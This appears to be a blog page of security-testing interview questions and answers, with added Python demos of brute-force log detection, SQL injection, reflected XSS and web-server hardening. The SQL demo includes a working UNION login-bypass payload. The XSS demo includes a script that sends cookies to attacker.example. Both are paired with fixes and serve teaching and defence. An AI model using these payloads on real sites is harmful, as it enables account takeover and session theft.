Tuesday, May 27, 2014

20 TOP Security Testing Interview Questions and Answers pdf

Most frequently Asked Security Testing Interview Questions and Answers for freshers and experienced pdf free download

1.    What is security testing and smoke testing?
Security testing checks whether a system resists attack and protects its data. Typical activities are:
1. Scanning the network for exposed hosts and services
2. Cracking or guessing passwords
3. Reviewing logs for signs of attack
4. Detecting viruses and other malware
5. War driving, i.e. testing 802.11 wireless LANs for open or weakly protected access points
Smoke testing is different: it is a quick check that the core functions of a new build work at all, run before deeper testing (security testing included) is worth starting.
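Log review from the list above, as an added example that is not part of the original page: it scans sshd authentication lines for password-guessing (the defender's view of the "cracking password" item) and flags a source address that fails repeatedly inside a short window, and the more worrying case of a success following a run of failures. The log lines are constructed for the example and follow OpenSSH's sshd message format; the threshold and window are assumptions a real deployment would tune.

```python
# Added example, not from the original page: brute-force detection over
# constructed sshd log lines. Threshold and window are assumptions.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: one address hammering root and then getting in,
# one ordinary user who mistyped once, one slow guesser an hour apart.
SAMPLE_AUTH_LOG = """\
May 27 10:01:02 web1 sshd[4021]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
May 27 10:01:04 web1 sshd[4023]: Failed password for root from 203.0.113.7 port 51123 ssh2
May 27 10:01:05 web1 sshd[4025]: Failed password for root from 203.0.113.7 port 51124 ssh2
May 27 10:01:07 web1 sshd[4027]: Failed password for invalid user test from 203.0.113.7 port 51125 ssh2
May 27 10:01:09 web1 sshd[4029]: Failed password for root from 203.0.113.7 port 51126 ssh2
May 27 10:01:11 web1 sshd[4031]: Accepted password for root from 203.0.113.7 port 51127 ssh2
May 27 10:15:30 web1 sshd[4102]: Failed password for alice from 198.51.100.4 port 40111 ssh2
May 27 10:15:40 web1 sshd[4104]: Accepted publickey for alice from 198.51.100.4 port 40112 ssh2
May 27 10:30:00 web1 sshd[4200]: Failed password for root from 192.0.2.9 port 33001 ssh2
May 27 11:30:00 web1 sshd[4201]: Failed password for root from 192.0.2.9 port 33002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(log_text, year=2014):
    """Yield (timestamp, result, user, ip) for each sshd auth line.
    Syslog lines carry no year, so the caller supplies it."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated lines are skipped, not treated as errors
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def find_bruteforce(log_text, threshold=4, window_s=300):
    """Return {ip: total_failures} for every source with at least
    `threshold` failed logins inside some `window_s`-second window."""
    fails = defaultdict(list)
    for ts, result, _user, ip in parse(log_text):
        if result == "Failed":
            fails[ip].append(ts)
    flagged = {}
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted times
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def successes_after_failures(log_text, min_failures=3):
    """Return (ip, user, timestamp) for each successful login from a
    source that had already failed `min_failures` times: a guess that
    eventually worked, which deserves a look more than the failures do."""
    fail_count = defaultdict(int)
    hits = []
    for ts, result, user, ip in parse(log_text):
        if result == "Failed":
            fail_count[ip] += 1
        elif fail_count[ip] >= min_failures:
            hits.append((ip, user, ts))
    return hits


if __name__ == "__main__":
    print("brute force:", find_bruteforce(SAMPLE_AUTH_LOG))
    print("success after failures:", successes_after_failures(SAMPLE_AUTH_LOG))
```

On the sample above only 203.0.113.7 trips the default threshold; the slow guesser at 192.0.2.9 is only caught when the window is widened, which is the usual trade-off between catching low-and-slow attempts and flagging users who mistype.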

2. What type of security testing have you performed?
A very common task in security testing is trying to attack the system yourself, which shows how vulnerable it is before a real attacker finds out. Most systems rely on hashing or encryption to protect stored passwords, tokens in URLs and similar secrets, so typical tests try to get past those controls: attempting to log in with many different password combinations, trying to inject script into pages (cross-site scripting), and so on. Another very common example is checking whether the application is vulnerable to SQL injection.
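The SQL-injection check mentioned above, as an added example that is not part of the original page. It builds a small in-memory SQLite database (schema, users and both query shapes are assumptions for the demo), stores passwords as salted PBKDF2 hashes rather than reversibly encrypted values, and shows that the hashing alone does not save a login routine that pastes user input into its SQL: a UNION payload lets the attacker log in as any user with a password of their own choosing, while the parameterized version treats the same input as plain data.

```python
# Added example, not from the original page: SQL injection against a
# string-built login query versus a parameterized one. The schema, users
# and queries are assumptions for the demo; SQLite runs in memory.
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000  # PBKDF2 work factor; a real deployment tunes this


def hash_password(password, salt=None):
    """Store a salted, slow hash of the password instead of the password
    (or an encrypted copy of it): verification only needs to recompute
    the hash and compare, so nothing reversible has to be kept."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db():
    """Constructed test database with two users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", hash_password("correct horse")),
                    ("bob", hash_password("hunter2"))])
    return db


def login_vulnerable(db, name, password):
    """User input is pasted into the SQL text, so it can change the
    structure of the query. Returns the authenticated name or None."""
    sql = f"SELECT name, pw FROM users WHERE name = '{name}'"
    row = db.execute(sql).fetchone()
    if row is None or not verify_password(password, row[1]):
        return None
    return row[0]


def login_safe(db, name, password):
    """Same query, but the value travels as a bound parameter: whatever
    it contains is compared as data and never parsed as SQL."""
    row = db.execute("SELECT name, pw FROM users WHERE name = ?",
                     (name,)).fetchone()
    if row is None or not verify_password(password, row[1]):
        return None
    return row[0]


def union_payload(attacker_password):
    """Constructed attacker input for the name field. It closes the
    string literal, UNIONs in a row carrying the victim's name and a hash
    of a password the attacker knows, and comments out the rest of the
    original query, so the hashed storage is irrelevant."""
    return f"x' UNION SELECT 'alice', '{hash_password(attacker_password)}' --"


if __name__ == "__main__":
    db = make_db()
    payload = union_payload("pwned")
    print("vulnerable:", login_vulnerable(db, payload, "pwned"))  # alice
    print("safe:      ", login_safe(db, payload, "pwned"))        # None
```

The classic `' OR '1'='1` payload also returns a row from the vulnerable query, but the password check still fails; the point of the UNION variant is that the attacker supplies the credential the application will verify against.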

3.    What is Cross-Site Scripting (acronym: XSS)?
Cross-site scripting occurs when a web application takes data from an untrusted source and includes it in a page without validating or encoding it. In the reflected form the attacker crafts a hyperlink whose query string carries the malicious script; the malicious part is typically percent-encoded (hex) or otherwise obfuscated so that the link looks less suspicious when the victim clicks it. The application decodes the data, builds its response around it and sends the page back, so the script runs in the victim's browser as though it were legitimate content from the site, with the same access to that site's cookies and session as the site's own scripts.
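The reflected XSS flow described above, as an added example that is not part of the original page: a percent-encoded attacker link, the decoded parameter the application "gathers", a vulnerable render function that reflects it verbatim, and the fixed version that HTML-encodes it on output. The site name, endpoint, parameter name and payload are assumptions chosen for the illustration.

```python
# Added example, not from the original page: reflected XSS in a minimal
# page-rendering function, and the output-encoding fix. URL, parameter
# and payload are constructed for the demo.
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link. The payload is percent-encoded so the URL
# looks less suspicious; the server decodes it back to a <script> element
# that sends the victim's cookie to the attacker's host.
MALICIOUS_LINK = (
    "https://shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example"
    "%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url, name):
    """What the application gathers: the decoded value of one parameter."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(q):
    """Reflects the parameter straight into the page body."""
    return f"<h1>Results for {q}</h1>"


def render_search_safe(q):
    """Encodes for the HTML text context before reflecting. quote=True
    also covers the case where the value lands inside an attribute."""
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def has_script_element(page):
    """Crude check used by the demo: does a real <script> tag survive?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    q = query_param(MALICIOUS_LINK, "q")
    print("decoded parameter:", q)
    print("vulnerable:", render_search_vulnerable(q))
    print("safe:      ", render_search_safe(q))
```

Encoding must match the output context: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL or a CSS rule needs that context's own escaping.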

4.    What are the most important steps you would recommend for securing a new web server?
The following are the most important steps for securing a new web server:
1. Update/patch the web server software, and keep it patched
2. Minimize server functionality: disable or remove the modules that are not needed
3. Remove the default scripts and sample data that ship with the server
4. Increase the verbosity of logging, and review the logs
5. Set file ownership and permissions so that the web server process can read, but not modify, the content it serves
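A check for steps 3 and 5 above, as an added example that is not part of the original page: it walks a document root looking for files or directories any local user can write to, and for leftover default or backup content. It runs against a throw-away directory tree built here; the name patterns for "default content" and the directory layout are assumptions a real server would tune.

```python
# Added example, not from the original page: audit a web document root
# for world-writable entries and leftover default/backup content.
# Name patterns and the demo layout are assumptions.
import os
import stat
import tempfile
from fnmatch import fnmatch

# Lower-case glob patterns for files that should not ship on a production
# server (assumed list, extend for the server in question).
DEFAULT_CONTENT = ("phpinfo.php", "test.php", "*.bak", "*.orig", "*.swp", "readme*")


def world_writable(root):
    """Relative paths under root that any local user may modify."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def leftover_default_content(root):
    """Relative paths of files matching a DEFAULT_CONTENT pattern."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if any(fnmatch(name.lower(), pat) for pat in DEFAULT_CONTENT):
                found.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(found)


def _write(path, text, mode=0o644):
    with open(path, "w") as f:
        f.write(text)
    os.chmod(path, mode)


def build_demo_docroot():
    """Constructed docroot: one sane page, a leftover phpinfo page, a
    config backup, and a world-writable uploads directory."""
    root = tempfile.mkdtemp()
    for sub in ("app", "uploads"):
        os.makedirs(os.path.join(root, sub))
        os.chmod(os.path.join(root, sub), 0o755)
    _write(os.path.join(root, "app", "index.html"), "ok")
    _write(os.path.join(root, "phpinfo.php"), "<?php phpinfo();")
    _write(os.path.join(root, "app", "config.php.bak"), "db_password=secret")
    os.chmod(os.path.join(root, "uploads"), 0o777)
    return root


if __name__ == "__main__":
    root = build_demo_docroot()
    print("world-writable:", world_writable(root))
    print("default content:", leftover_default_content(root))
```

A world-writable upload directory is the usual way step 5 is violated in practice: anything the server process (or any other local account) can write under the document root can be turned into served content.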

5. Difference between Verification and Validation
Verification - confirms that the product is being built right: reviews, inspections and tests check that each stage of the process correctly implements the outputs of the previous one. The question it answers is "Are we building the product right?"
Validation - confirms that the right product is being built: the developed software is tested against the client's requirements to show that it does what the client needs. The question it answers is "Are we building the right product?"

6.    What is configuration management?
Configuration management aims to establish consistency across an enterprise's systems. It does this by keeping the organization's processes up to date, maintaining versioning, and tracking the network, hardware and software components so that their state is always known and controlled.
In software, software configuration management (SCM) deals with controlling and tracking changes made to the software, so that changes can be accommodated at any time without losing a known-good state.

7.    What are the staged and continuous models in CMMI?
Staged representation:
The staged representation groups the process areas into five maturity levels. It is inherited from the predecessor software development CMM, and it is the representation used to obtain a CMMI maturity-level rating from a SCAMPI appraisal.
Continuous representation:
The continuous representation, inherited from the predecessor systems engineering CMM, rates capability levels within each process area individually, so an organization can choose which process areas to improve first.
The difference between the two representations is purely organizational; the process-area content is equivalent.

8.    What is tailoring?
Tailoring a software process means amending it to meet the needs of a particular project. It involves adapting the process to different environments and is an ongoing activity rather than a one-time step. Factors such as the relationship with the customer and end users and the goals of the business must be kept in mind while tailoring, and the degree to which tailoring is required must be identified up front.

9.    What is a process area in CMMI?
Process areas in the Capability Maturity Model describe the practices of product development. Satisfying the goals of the process areas is what determines the maturity level an organization has attained. They mainly include:
Project planning and monitoring
Risk management
Requirements development
Requirements management
Process and product quality assurance
Product integration
Configuration management

10.    What is a maturity level?
A maturity level describes how well-defined and controlled an organization's processes are. The levels give a benchmark against which an organization can be assessed and can set improvement targets.
The five levels of the staged representation are:
Level 1: Initial (ad hoc)
Level 2: Managed (called Repeatable in the older SW-CMM)
Level 3: Defined
Level 4: Quantitatively Managed (called Managed in the older SW-CMM)
Level 5: Optimizing

11.    What is a software process?
A software process, or software development process, is the method or structure expected to be followed when developing software. It consists of a set of tasks and activities. Different process models exist, such as waterfall and iterative, and in all of them tasks like analysis, design, coding, testing and maintenance play an important role.

13.    What are the different modes of recording in WinRunner?
WinRunner has two recording modes:
1. Context Sensitive recording – records the operations performed in an application by identifying the GUI objects and windows they are performed on, so the script does not depend on where the window sits on the screen.
2. Analog recording – records the raw keyboard input, mouse clicks and the x and y coordinates the mouse pointer travels across the screen. It does not identify GUI windows or objects, so the recording is tied to the exact screen layout.

15.  What is "Penetration Testing"?
Penetration testing is a security testing process that identifies vulnerabilities in an application, system or network by attacking it with the same techniques a malicious actor would use. Its purpose is to find and fix those vulnerabilities, and so protect important data, before someone without legitimate access (an external attacker) exploits them. Because it involves real attacks on live systems, a penetration test is carried out only after careful consideration, written authorization, notification of the affected parties and planning.

Two common types are white box testing and black box testing. In white box testing the tester is given all the information before starting, such as IP addresses, source code and infrastructure diagrams, and plans the tests from it. In black box testing the tester has no information about the system under test. This simulates an outside attacker more closely, since a real attacker starts without knowledge of the system, but in the same amount of time it usually achieves less coverage than a white box test.

16. What steps do you follow when planning and performing security testing?
The steps to prepare for and carry out security testing are:
1. Understand the business requirements and the organization's security goals and objectives, including any compliance obligations (for example, the organization might be aiming for PCI compliance). The test plan must account for all of these.
2. Understand and analyze the requirements of the application under test.
3. Collect all the setup information for the software and the network: operating systems, technologies, hardware.
4. Make a list of vulnerabilities and security risks.
5. Based on that list, prepare a threat profile.
6. Based on the identified threats, vulnerabilities and security risks, prepare a test plan that addresses them.
7. For each identified threat, vulnerability and risk, prepare a traceability matrix mapping it to the test cases that cover it.
8. Not all security testing can be done manually, so identify the tools that will execute the test cases faster and more reliably.
9. Prepare the security test case document.
10. Execute the security test cases and retest the defect fixes.
11. Execute the regression test cases.
12. Prepare a detailed security testing report listing the vulnerabilities and threats found, the risks they carry, and the issues still open.
